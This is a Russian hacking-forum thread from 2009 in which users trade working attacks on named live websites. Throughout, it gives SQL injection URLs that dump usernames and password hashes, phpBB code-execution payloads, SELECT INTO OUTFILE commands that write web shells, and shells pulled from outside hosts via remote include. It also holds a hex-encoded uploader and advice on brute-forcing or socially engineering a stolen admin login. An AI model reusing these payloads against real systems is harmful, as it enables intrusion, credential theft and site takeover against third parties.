unhex(hex(concat_ws(0x3a,)))

http://tinakandelaki.ru/index.php?page=press&id=-1+union+select+1,unhex(hex(concat_ws(0x3a,database ()))),3,4,5--+

Pashkela
02.05.2009, 01:12
concat_ws(0x3a

в данном случае не нужен, используется только для вывода НЕСКОЛЬКИХ данных подряд, user:pass:mail например

если только один параметр надо выцепить - то просто лишний оператор, иногда имеет значение при ограничении длины запроса

o3,14um
02.05.2009, 01:45
Pashkela, я не думаю, что он этого незнал, так, для удобства написал, чтобы потом можнобыло не только датабэйс выводить

Pashkela
02.05.2009, 01:52
я тоже подозреваю, что знал, читай про "длину запроса". Не просто так написал

Spyder
02.05.2009, 02:19
вообще использование concat_ws более надёжно, функция concat если ей будет передано значение равное NULL вернёт 0, а не то что хотелось бы)
поэтому старайтесь юзать with separator, дабы избежать лишних проблем

diznt
02.05.2009, 13:50
Кто знает актуал методы залития шелла в phpbb?
Импорт БД не канает, в гугле искал - ничего нормального

mailbrush
02.05.2009, 13:54
Импорт БД не канает
Почему? У меня все работает. Используй метод с аватарой.

diznt
02.05.2009, 13:59
mailbrush вот! хочу спросить про метод с аватаркой
Поподробней расскажи своими словами как его юзать
Эксплоит от шанкара не канает почему то

При импорте БД пишет

SQL Error : 1045 Access denied for user '***'@'%' (using password: YES)

DrAssault
02.05.2009, 14:07
При импорте БД пишет

SQL Error : 1045 Access denied for user 'stasya'@'%' (using password: YES)

Ничего удивительного нет, прав у текущего юзера не хватает на выборку из БД...
mailbrush вот! хочу спросить про метод с аватаркой
Поподробней расскажи своими словами как его юзать
Эксплоит от шанкара не канает почему то
Метод древний как сам мир... на линк (http://forum.antichat.ru/threadnav23501-1-10.html) почитай, там всё описанно, можно кстати не только через аватарку, как вариант ещё и атачем...

diznt
02.05.2009, 14:42
DrAssault не знаю правильно я сделал, кароче сделал файл xz.jpg в нем php скрипт который записывает в опр. файл кое-что, при загрузке пишет

Unable to upload file

DEBUG MODE

Line : 251
File : usercp_avatar.php

пробывал по разному: xz.jpg%00.php xz.php%00.jpg

laedafess
02.05.2009, 14:57
вот тебе все способы ^__^ (http://forum.antichat.ru/showpost.php?p=198446&postcount=3). На все форумах, что я пробовал, работал 4-й способ.

diznt
02.05.2009, 15:44
laedafess ок фенкс. 4 способ действительно проканал. (высвечиваеться phpinfo) но я чет не догоняю как залить с помощью этого шелл
Вот код который импортирую

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:
$file= fopen(`shell.php`,`w`);
fwrite($file, `<? @include("http://diznt.narod.ru/info2.txt"); ?>`);
fclose($file);' WHERE user_id=2;

Получаеться в подписи сам код!

phpbb
$file= fopen(`shell.php`,`w`);
fwrite($file, `<? @include("http
fclose($file);

При этом сам файл shell.php не создаеться!

laedafess
02.05.2009, 16:48
импортируешь код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system($_GET[cmd])' WHERE user_id=2;

потом site.com/phpBB2/profile.php?mode=editprofile&cmd=ls -lia
ну как то так)
и льешь шелл. Через wget, curl или fetch..

diznt
02.05.2009, 17:58
laedafess

Не канает
Подредактировал скрипт чуть (так как ты не правильно написал чуток)
При заходе на страницу (без GET запроса)
Пишет:


Warning: shell_exec() has been disabled for security reasons in /www/****/**.ru/html/forum/includes/usercp_register.php(895) : regexp code on line 1

Warning: system() has been disabled for security reasons in /www/****/**.ru/html/forum/includes/usercp_register.php(895) : regexp code on line 1


А если переходить вместе с GETом то идет редирект на главную страницу форума

mailbrush
02.05.2009, 18:05
Ну значит отключены ф-кции.

diznt
02.05.2009, 18:08
mailbrush ну так это то ясно что отключенны функции
я имею ввиду есть еще какие нибуть методы?

InFlame
02.05.2009, 18:33
У меня похожая ситуация, при подстановке system($_GET[cmd]) ничего не выходит, хотя функции включены...

geezer.code
02.05.2009, 18:33
в общем там сейф мод=он
попробуй другие функции, например passthru.(хотя скорее всего тоже не пройдет)
ищи способы обхода сейф мода(в гугл с запросом safe_mode bypass )

хотя, имхо, тебе еще рано.

_FallenAngel_
02.05.2009, 22:02
Я знаю акк админа на одном сайте созданым на юкоз,можно ли с помощью его както взломать панель управления?

mailbrush
02.05.2009, 23:51
Можно. СИ / Брут.

Spyder
03.05.2009, 00:18
geezer.code, нет, там как бэ не сейф мод, если бы был сейф мод - пшп ругался бы на то что включен сейф мод, а пшп ругается что отключены функции
Warning: shell_exec() has been disabled for security reasons

Вообще тут надо пробовать другие системные функции, типа popen или passthru
а вообще лучше залить гифку с полноценным шеллом, вместо
'phpbb:system($_GET[cmd])'
вставить
='phpbb:include($_GET[cmd])'
и его проинклудить. А там уже можно посмотреть какие функции отключены и если отключены все функции позволяющие выполнять команды, пробовать залить перловый шелл с штацессом
вот, удачке в хэке =)

Qwazar
03.05.2009, 00:49
Лучше eval, т.к. удалённый инклуд тоже может быть запрещён.

Spyder
03.05.2009, 01:03
Qwazar, я про удалённый инклуд и не говорил)

а вообще лучше залить гифку с полноценным шеллом

так как он в админке пшпбб, то там наверника есть способ залить картинку

o3,14um
03.05.2009, 02:57
а ещё лучше echo =)

echo `ls -la`; - с косыми кавычками выполняет ту же функцию, что и пасстру ;-)

Qwazar
03.05.2009, 03:06
а ещё лучше echo =)

echo `ls -la`; - с косыми кавычками выполняет ту же функцию, что и пасстру ;-) Ничем не лучше, для того, чтобы это работало, должна быть включена функция shell_exec, а она не пашет при сейф моде. В отличии от eval.

P.S.
И работает она не как passthru(), а как shell_exec().

Велемир
03.05.2009, 04:04
Заранее извиняюсь,что не прочитал всю тему,но нельзя ли выполнить phpinfo() для просмотра safe_mode = On

Если РНР запущен в виде CGI модуля, то safe mode полюбому отсутствует.Также при юзании include,fopen(),file() и других функций safe mode даст о себе знать.Можно попробовать позапускать сценарии в различных каталогах(функциями system(),exec(),popen(),если они работают). Опять же будет попытка ругани со стороны сервера на то,что ты откроешь чужой фаил.Значит,опять сейф мод стоит.То бишь сразу будет ясно,что стоит директива safe_mode_exec_dir.Ещё можно попробовать создавать файлы с помощью php функций в других каталогах.Если будет ругаться - опять safe mode.Вообще,при safe mode,будут введены ограничения на следующие функции:

chgrp include require
chmod link rmdir
chown passthru symlink
exec popen system
fopen readfile unlink
file rename

Если со всеми ними будет неладно,то 100% стоит safe mode.Пробуй)

gromoza
03.05.2009, 18:37
select '<? eval(stripslashes($_GET[phpinfo])); ?>' from dle_files into outfile 'C:/Program Files/VertrigoServ/www/engine/inc/check.php'
Как при имеющимся доступе в PMA залить нормальный шелл, а не это.

mailbrush
03.05.2009, 20:47
select '<? include("http://bestquest.info/shell.txt") ?>' into outfile 'C:/Program Files/VertrigoServ/www/engine/inc/check.php'

geforce
03.05.2009, 23:50
Вопрос:[U]

http://wow.alania.net/?page=guilds&id=-7'

Это инъекция???

[x59]ReV
03.05.2009, 23:53
geforce нет
но тут
http://wow.alania.net/?page=
инклуд.

geforce
04.05.2009, 00:03
ReV']geforce нет
но тут
http://wow.alania.net/?page=
инклуд.

Это значит я туда могу shell загрузить?

[x59]ReV
04.05.2009, 00:18
geforce
Локальный инклуд... через него ты можеш прочитать любой фаил на серваке.

Grey
04.05.2009, 00:24
ReV']geforce
Локальный инклуд... через него ты можеш прочитать любой фаил на серваке.

А с каких пор при локальном инклуде можно прочитать любой файл на серве?
При инклуде можно проинклудить файл, выполнив в нём код, а не прочитать, это далеко не одно и тоже.
Не надо путать людей, а то что можно просмотреть содержимое файлов без пхп кода - это не равносильно читалке файлов.

[x59]ReV
04.05.2009, 00:30
Извини меня но если человеку слово инклуд ни о чём не говорит то острактное "прочитать" даст большее понимание чем проинклудить которое более непонятно чем само слово инклуд.

Расширяйте кругозор:
Читать
Воспринимать какую-н. письменную речь по ее внешним знакам, буквам и т. п. (произнося вслух или про себя, молча).Ч. буквы. Ч. слова. Ч. по…

Grey
04.05.2009, 00:36
ReV']Извини меня но если человеку слово инклуд ни о чём не говорит то острактное "прочитать" даст большее понимание чем проинклудить которое более непонятно чем само слово инклуд.

Если ты не можешь дать полноценный ответ, то лучше промолчи.
Ответить на вопрос, сказав что при локальном инклуде можно проинклудить пхп файл выполнив в нём код, который зальёт шелл (или сам код шелла) или прочитать файл не содержащий пхп кода (/etc/passwd, .htpasswd и т.д.) и дать линк на статью (http://forum.antichat.ru/threadnav91807-1-10.html) на тему инклуда не так сложно.

Ещё, как совет можно сказать, что можно пытаться проинклудить:

1. Логи апача.
2. Файл сессии.
3. Залитый через форум (или какой нидь двиг) картинку с пхп кодом.

geforce
04.05.2009, 00:50
ReV']Читать
Воспринимать какую-н. письменную речь по ее внешним знакам, буквам и т. п. (произнося вслух или про себя, молча).Ч. буквы. Ч. слова. Ч. по…

Какое условие не выполнено???

Вообщета я по пыху проф а не по уязвимостям, знал бы не спросил! Учусь быстро! Там инклуд точно а значит к примеру с сайта http://site.ru/shell.php подставить к
http://wow.alania.net/?page=!

И получится http://wow.alania.net/?page=http://site.ru/shell.php

Я прав???

И обьясните плиз почему это не инъекция???

http://wow.alania.net/?page=guilds&id=-7'

[x59]ReV
04.05.2009, 00:59
geforce
LFI (Local File Include)
Можно как выражается грэй инклудить только локальные фаилы (находящиеся на сервере wow.alania.net)

Попробуй выполнить команду
http://wow.alania.net/?page=guilds&id=7+and+1=1+--+
http://wow.alania.net/?page=guilds&id=7+and+1=2+--+

geforce
04.05.2009, 01:04
ReV']geforce
LFI (Local File Include)
Можно как выражается грэй инклудить только локальные фаилы (находящиеся на сервере wow.alania.net)

Попробуй выполнить команду
http://wow.alania.net/?page=guilds&id=7+and+1=1+--+
http://wow.alania.net/?page=guilds&id=7+and+1=2+--+

Друг ты помоему обкурился :D :D :D

Вообщет надо сначало поля вывода подобрать путем order или методом перебора union+select+1,2,3,4,5,......./**/

[x59]ReV
04.05.2009, 01:05
geforce

Подбирай , как подберёш отпишись.
И прочитай хотябы фак.
http://forum.antichat.ru/thread19844.html
OffTop
Круто статусное сообщение влияет на отношение к людям))
Хочу -10000 поможете??
Grey: Эт не оскорбление это у меня в статусе написано...или меня ачат оскарбляет? 0_0

Grey
04.05.2009, 01:14
2 geforce

1. Он уже ответил тебе, что скули в том параметре нет.
2. У тебя очень низкие познания в синтаксисе sql, прочти статью линк на которую он тебе дал (а ещё заодно статью (http://forum.antichat.ru/threadnav43966-1-10.html) от Dr.Z3r0).
3. Очень советую прочитать статью про инклуд.
Вообщем то инклуд достаточно серьезная уязвимость и повозиться с ним более чем разумно.
4. Не надо ни кого оскорблять.

2 Rev

Фразы "Друг ты помоему обкурился" и "Ламер" - это всё таки оффтоп и оскорбления.

[x59]ReV
04.05.2009, 01:19
geforce
дрЗиро ---- >http://forum.antichat.ru/thread43966.html
Не ну я так и не понял -10000 у меня в репе случится??

diznt
04.05.2009, 02:02
http://www.witchvox.com/vn/vn_detail/dt_wn.html?a=usak&id=19242

я понял что тут скуль иньекция возможна
но при подборе колонок (union+select) я почему то их немогу подобрать(дошол до 30 но не увидел ничего)
в чем дело?

ElteRUS
04.05.2009, 03:45
http://www.witchvox.com/vn/vn_detail/dt_wn.html?a=usak&id=19242+and+ascii(substring((select+concat_ws(0x2 F,table_name,table_schema,column_name)+from+inform ation_schema.columns+where+column_name+like+0x2570 61737325+limit+0,1),1,1))>1--+

AkyHa_MaTaTa
04.05.2009, 04:43
Там рядом с выводом скуля:
http://www.witchvox.com/va/dt_va.html?a=usfl&c=notes&id=10154)+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,concat_ws(0x3a,user,password,host,file_priv) ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,8 2,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98, 99,100,101,102,103,104,105,106,107,108,109,110,111 ,112+from+mysql.user--+

--------------------------------------------------


К топу ниже:

http://www.placementindia.com/job-search/view_res.php?code=546588&res_ty=ml'+union+select+1,concat_ws(0x3a,'%3Ch1%3E ',user(),version(),database(),'%3C/h1%3E')+--+

molotovkeyt
04.05.2009, 04:59
http://www.placementindia.com/job-search/pi_fl_srch.php?offset=-1
Кто рассковыряет, тому будет всякое счастье :) Я не смог.

gromoza
04.05.2009, 07:23
select '<? include("http://bestquest.info/shell.txt") ?>' into outfile 'C:/Program Files/VertrigoServ/www/engine/inc/check.php'
Не у себя попробывал файл check.php создался в нём текст <? include("http://127.0.0.1/shell.txt") ?>
захожу на сайт шелл выплёвывает это
Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\Program Files\VertrigoServ\www\check.php on line 1

Warning: include(http://127.0.0.1/shell.txt) [function.include]: failed to open stream: no suitable wrapper could be found in C:\Program Files\VertrigoServ\www\check.php on line 1

Warning: include() [function.include]: Failed opening 'http://127.0.0.1/shell.txt' for inclusion (include_path='.;C:\Program Files\VertrigoServ\Smarty') in C:\Program Files\VertrigoServ\www\check.php on line 1

AkyHa_MaTaTa
04.05.2009, 08:43
загрузи какой нибудь мини аплоудер, например(пробелы поуберай):


select
0x3c3f706870206576616c28677a696e666c61746528626173 6536345f6465636f646528276a5a505062707441454d62766c 76774f6f35556c45696b4f6971746547724261705553706c4e 535737665a6957516a44576944787237445974616f2b583376 724a512b416b6c433769634532394e4244716e515854427858 506654437a734c332f575a326471693543744642684a72636c 5472767055366665393036655863687665334a6e5661727877 324f7135556130386a456b5833564d3179796f32366674576c 38666c6f4941396430416731375643494977706e556b616f56 5153655732575172566a5332586b6939563641543474627868 3841596979654f5462424e36723270693045744e6949692b43 50686d6655595646337866457a665451786263795a2b2f616a 782f41677846444749695a76774a6278655a62506245483647 502b36534b3468445745657271326746416c3949714a597638 773864625a72583032674b77795a634a71744643446433447a 41724d504d53492f44444a7255316d486a6b6542596f4b6a45 635730522f4e51534268596e7561434a79485a2f75734b3053 656859525759464a44466678434d2f73645530684369763757 356265773232654a647657477445736875304742416f7a6177 41435737466f624f4f4a7a4849694743746d674e6b4e734332 7433364f38723475484842622b503478465778677137753351 31563230596536345234614a537a654c632f652f6848347774 4179794159766f6d584c74546d667a394434645073727a5675 524265512f385a6b4459754a5244704767736a77677661334b 3731653331756249443341414f41664749506e652b735a4c79 475452477347633559797758474b7a4a6a4c5248786164767a 7156756e79735077413336484c48636a664d416e7554643336 3957506c5572574e5564514a6530733543746c3947764f436c 47354873557877655178484354724e4e7347635777544f4233 6d697779574762702f41557237676b4e614657664b6333304d 5779356a2f384b2b77702f41413d3d272929293b203f3e
INTO DUMPFILE
'C:/Program Files/VertrigoServ/www/engine/inc/uplouder.php'

ну а уже с помошью него загрузи шелл.

oRb
04.05.2009, 10:59
http://www.placementindia.com/job-search/pi_fl_srch.php?offset=-1
Кто рассковыряет, тому будет всякое счастье :) Я не смог.
Там и не раскрутишь, тк инъекция в limit'е. Ищи другие инъекции, к примеру вот:
http://www.placementindia.com/job-recruiters/vac_hdetl.php?slno=238629'+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29+--+
Вывод присутствует.

Климент_Ворошилов
04.05.2009, 21:02
Кто сможет подсказать.
При помощи information_schema.schemata узнал имена используемых баз, а как узнать имена таблиц в конкретной базе?
Ведь как я понимаю по information_schema.tables выводятся имена таблиц во всех базах, а не в какой-то конкретной? Так ли, или я чего-то путаю?

ElteRUS
04.05.2009, 21:12
select table_name from information_schema.tables where table_schema='blabla';

Saiga
04.05.2009, 23:40
приятного времени суток....

Возник вопрос.
Смотрел статью : https://forum.antichat.ru/showpost.php?p=1047515&postcount=79
и не хрена не понял ))))

сайт : http://www.intes-online.de/cms/index.php?id=1


Order/group by 1


подскажите , это уже не в 1 раз

Ps: спс за время

Pashkela
04.05.2009, 23:53
http://www.intes-online.de/cms/index.php?id=1+and+substring(version(),1,1)=5

Jokester
04.05.2009, 23:53
Saiga
Там дальше комментарии.
Писал я это для того, что-бы показать , что вывод ВОЗМОЖЕН, но не везде разумеется.
Тоесть никто не говорил, что при двойных запросах 100% будет вывод

Saiga
05.05.2009, 00:11
Pashkela
я не это спрашивал , извините за кривой вопрос.....


Jokester
пардон , я только "смотрел" )))))

Grookle
05.05.2009, 01:59
Доброго времени суток всем.
Подскажите пож. как примерно должен выглядеть запрос ,если ошибка в Mysql выводится при подстановке запятой вот так:
site.com/bla.php?id='5
Интересует именно конструкция запроса.
Заранее благодарен за ответ.

ElteRUS
05.05.2009, 03:47
как примерно должен выглядеть запрос

Запрос для чего ? Что нужно узнать то ? Какие данные вытащить ?..

Я думаю так, товарищ, начинайте не спеша отсюда:
https://forum.antichat.ru/thread104591.html

потом плавно переходите сюда:
https://forum.antichat.ru/threadnav43966-1-10.html

ну а в идеале не побрезгуйте и этим: (с 1 по 22 включительно)
http://www.sqlbook.ru/

удачи

massovka
05.05.2009, 12:59
Привет! Ребята такой вопрос изучаю сервак жервы и нашел /y_key_ec978e5d0cf6ceb1.html в

что это может бить?

krypt3r
05.05.2009, 13:18
Grookle, сотни раз уже писано-переписано
Подбор колонок: site.com/bla.php?id=5+order+by+1000/*
Sql-Inj: site.com/bla.php?id=-999+union+select+1,2,table_name,4,5+from+informati on_schema.tables/*

krypt3r
05.05.2009, 13:43
Нечетное кол-во апострофов в результирующем запросе - потенциальная sqlinj

ElteRUS
05.05.2009, 13:55
http://www.powerhousemuseum.com/designersatwork/how.php?ID=10+or+1=(select+top+1+table_name+from+i nformation_schema.tables)--+

mssql

почитай http://forum.antichat.ru/thread30501.html

R1dex
05.05.2009, 14:16
Не выводит таблицы, а выводит ошибку =(

Смотри внимательно, пишет:

Conversion failed when converting the nvarchar value 'Designers' to data type int.

Designers - это и есть табла.

ЗЫ: И пробел убери в ссылке.

mailbrush
05.05.2009, 15:35
Как эту расскрутить?http://www.ncmec.eu/case.php?Id=1Тут походу стоит ограничение на кол-во символов?!

-m0rgan-
05.05.2009, 15:59
2mailbrush
Да, там действительно ограничение количества символов в урле:
http://www.ncmec.eu/case.php?Id=1*1*1*1*1*1*1*1*1*1*1--+

Query failed: SELECT * FROM caseTbl WHERE ID=1*1*;

http://www.ncmec.eu/case.php?Id=1+order+by+1--+

Query failed: SELECT * FROM caseTbl WHERE ID=1 or;

ограничение на 3 символа после Id=

На счёт обхода не скажу ничего, ибо не видел ни разу статтей на подобную тему, но по сути ограничение прописывается в настройках сервера...

mailbrush
05.05.2009, 16:20
-m0rgan-, почисти ПМ. Насчет поста http://forum.antichat.ru/showpost.php?p=1259709&postcount=9197 - скорее всего, ты тупишь. Смотри, выбраная БД - b35015_catalo, а для cizar_admin http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,table_schema,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20/**/from/**/information_schema.tables/**/where/**/table_name=0x63697a61725f61646d696e b35015_a. Таким образом http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,concat_ws(0x3a,id,login,password),4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20/**/from/**/b35015_a.cizar_admin

cr0w
05.05.2009, 16:30
2mailbrush
Да, там действительно ограничение количества символов в урле:
http://www.ncmec.eu/case.php?Id=1*1*1*1*1*1*1*1*1*1*1--+

Query failed: SELECT * FROM caseTbl WHERE ID=1*1*;

http://www.ncmec.eu/case.php?Id=1+order+by+1--+

Query failed: SELECT * FROM caseTbl WHERE ID=1 or;

ограничение на 3 символа после Id=

На счёт обхода не скажу ничего, ибо не видел ни разу статтей на подобную тему, но по сути ограничение прописывается в настройках сервера...Не не, тут явно в самом скрипте данные отрезаются, например, субстрингом: substr($_GET['Id'], 0, 4); . Инъекцию провести наврядли выйдет. (;

-m0rgan-
05.05.2009, 16:39
Да, я реально ступил, я почему то забыл про database() :(

-m0rgan-
05.05.2009, 17:16
Не не, тут явно в самом скрипте данные отрезаются, например, субстрингом: substr($_GET['Id'], 0, 4); . Инъекцию провести наврядли выйдет. (;

Да, скорее всего ты прав, ибо ограничение стиит только на параметры, а длинна ссыли может быть большой...
Но здесь факт в том, что хз как такое ограничение обойти :(

mailbrush
05.05.2009, 17:33
Не хз как, а никак =)

-m0rgan-
05.05.2009, 21:30
Вот появился вопросик...
Что есть RFI SQL INJECTION и где можно почитать о её применении?
Спасибо!

mailbrush
05.05.2009, 22:10
-m0rgan-, не слышал о RFI SQL INJECTION, мб просто RFI? RFI/LFI - Remote File Include / Local File Inlude. Почитать:

http://forum.antichat.ru/thread12123.html
http://forum.antichat.ru/thread23501.html
http://forum.antichat.ru/thread91807.html
http://forum.antichat.ru/thread98525.html
http://forum.antichat.ru/thread49775.html

cr0w
05.05.2009, 22:31
-m0rgan-

Возможно, ты имеешь в виду те случаи, когда из SQL-запроса возвращается имя файла, который затем инклудится, т.е. RFI (или LFI) проводится через SQL-инъекцию, типа:
http://www.site.com/index.php?id=-1+union+select+1,2,[RFI],4,5?

Встречается иногда и PHP-injection (точнее, Code Execution, так как не только с php такое возможно) через SQL-injection , когда SQL-запрос возвращает код, который затем выполняется скриптом, тогда эксплуатация выглядит примерно так:
http://www.site.com/index.php?id=-1+union+select+1,2,'<?php system($_GET[a]); ?>',4,5&a=ls

Saiga
06.05.2009, 01:10
приятного времени суток.

Возник вопрос по поводу dx shell.

хочу загрузить его на сайт ,через админку. но могу это сделать тока в формате : gif, jpg, png, htm, html, pdf, zip, swf, mp3, flv, doc, docx, xls, xlsx, rtf


И почему то он у меня открывается в виде кода .

подскажите ,kak правильно залить шелл и запустить

udman
06.05.2009, 10:51
Не кидайте сильно в меня какашками так как я новичек ) подскажите что можно к примеру здесь сделать
http://www.privateurl.com/index.php?trans_lang=eng&langid=&username=user'+or+password=1

Error running query : select level,password from users where username = 'user' or password=1' and enabled=1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and enabled=1' at line 1

только надо заменить на password='1' вроде чет показывает но все равно ниче интересного :)

big_BRAT
06.05.2009, 11:08
....g=eng&langid=&username=user'+or+password=1
нужно просто отрезать лишнее
_http://www.privateurl.com/index.php?trans_lang=eng&langid=&username=user'+or+password=1/*

udman
06.05.2009, 11:14
You do not have access to this resource
все равно донт акссес

заодно если не тяжело посмотрите плиз вот
http://catlog.org.ua/tem.php?g=28&count=25'
я все унионы перепробовал до 34-го, чет никакого результата.

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/chat/public_html/pro/tem.php on line 38

ElteRUS
06.05.2009, 14:04
все равно донт акссес


Мор1ров заюзай

http://www.privateurl.com/index.php?trans_lang=eng&langid=&username=user'+and+if(ascii(substring((select+conc at_ws(0x2F,username,password)+from+users+limit+0,1 ),1,1))>1,1,(select+1+union+select+2))=1--+

А доступа нет возможно потому что ты не авторизирован. Попробуй зарегиться

-m0rgan-
06.05.2009, 14:56
-m0rgan-

Возможно, ты имеешь в виду те случаи, когда из SQL-запроса возвращается имя файла, который затем инклудится, т.е. RFI (или LFI) проводится через SQL-инъекцию, типа:
http://www.site.com/index.php?id=-1+union+select+1,2,[RFI],4,5?

Встречается иногда и PHP-injection (точнее, Code Execution, так как не только с php такое возможно) через SQL-injection , когда SQL-запрос возвращает код, который затем выполняется скриптом, тогда эксплуатация выглядит примерно так:
http://www.site.com/index.php?id=-1+union+select+1,2,'<?php system($_GET[a]); ?>',4,5&a=ls

Не, ну это я знаю...
Я видел такую фиговину, с названием RFI SQL INJ которая выглядила как то так:

http://www.centralpets.com/php/search/storiesdisplay.php?Story='83
http://www.centralpets.com/php/search/storiesdisplay.php?Story=\'83
http://www.centralpets.com/php/search/storiesdisplay.php?Story=%00'83
http://www.centralpets.com/php/search/storiesdisplay.php?Story="83
http://www.centralpets.com/php/search/storiesdisplay.php?Story=%3D83
http://www.centralpets.com/php/search/storiesdisplay.php?Story=%252783
http://www.centralpets.com/php/search/storiesdisplay.php?Story='"83
http://www.centralpets.com/php/search/storiesdisplay.php?Story=\"83
http://www.centralpets.com/php/search/storiesdisplay.php?Story="+and+1=0+--+83
http://www.centralpets.com/php/search/storiesdisplay.php?Story=)83

Qwazar
06.05.2009, 15:02
-m0rgan-, всё что видно по твоему логу, это попытка подобрать то какой вид кавычки нужен, нужна ли закрывающая скобка или не нужна вообще. (Да и то както криво с учётом того, где находится число 83)

З.Ы.
К RFI отношения не имеет.

-m0rgan-
06.05.2009, 15:06
Ясн, просто наткнулся на на эту фигню и ей кто то присвоил название RFI скуль нижект...

AET
06.05.2009, 15:20
подскажите новичку залил шель r57shell 1.3 как теперь его запустить и еще что означает иньекция и инклуд

-m0rgan-
06.05.2009, 15:32
Чтобы запустить шелл, проследуй в ту директорию, в которую ты его залил, например ты заливаешь его в папку tmp, то гуляй по адресу www.site.com/tmp/shell.php.
SQL-Injection – внедрение произвольного SQL-кода в исполняемый запрос
PHP-include – возможность включения произвольного PHP-кода в исполняемый поток на стороне сервера.

AET
06.05.2009, 16:10
здесь прочитал что шель можно залить и так http://wow.alania.net/?page=http://site.ru/shell.php если да то как его запустить если можете какую шель посаветуете если можно еще сылку на шели

-m0rgan-
06.05.2009, 16:20
Аааа, если так, то шелл отобразится по этом же адресу, то есть ты инклудишь свой шелл, на эту же страницу (http://wow.alania.net/?page=)

Пример:
http://www.jiznicechy.org/en/index.php?path=http://forum.antichat.ru

mailbrush
06.05.2009, 20:01
-m0rgan-, плохой пример. Тут не инклюд, а фрейм.

Skofield
06.05.2009, 21:54
В общем у меня вопрос следующего рода:
есть сайт и есть доступ к phpmyadmin-у а когда пытаюсь залить шелл с помощью конструкции select into outfile выдает такой ответ #1045 - Access denied for user… собственно вопрос – что это значит? это типа у юзера не хватает прав или что? И что с этим можно сделать? И может, есть какой то другой способ залить шелл через phpmyadmin-а???

Jokester
06.05.2009, 22:34
>>что это значит?
Да, у юзера нет прав.

>>что с этим можно сделать
Зайти под юзером у которого есть права

>>может, есть какой то другой способ залить шелл через phpmyadmin-а
Если нет прав на запись, то нет

Add:
Есть ещё уязвимости самого пыхадмина:
https://forum.antichat.ru/thread50669.html
Возможно тебе повезёт :)

Skofield
06.05.2009, 23:14
Add:
Есть ещё уязвимости самого пыхадмина:
https://forum.antichat.ru/thread50669.html
Возможно тебе повезёт :)

сенкс!

Serge24
06.05.2009, 23:52
Как это можно использовать?
/index.php?act=calendar&code=birthdays&y=2009&m=5&d=4
# user12 (19)
# user45 (21)
# user545 (17)
# user74 (22)
/index.php?act=calendar&code=birthdays&y[]=2009&m=5&d=4
# user587 (-1989)
# user577 (-1987)
# user5774 (-1991)
# user5546 (-1986)

geforce
07.05.2009, 00:04
Поскажите как пользоваться?

http://wow.alania.net/?page=


Warning: include(./inc/.php) [function.include]: failed to open stream: No such file or directory in Y:\home\78.110.144.12\www\index.php on line 104

Warning: include() [function.include]: Failed opening './inc/.php' for inclusion (include_path='.;/usr/local/php5/PEAR') in Y:\home\78.110.144.12\www\index.php on line 104

Pashkela
07.05.2009, 00:11
как-как, молча:

http://forum.antichat.ru/thread12123.html

geforce
07.05.2009, 00:39
Почему не сробатывает???

http://wow.alania.net/?page=http://gef48.narod.ru/antichat

Pashkela
07.05.2009, 00:43
потому что локальный инклуд, LFI:

./inc/ в начале стоит, видишь? http уже не проканает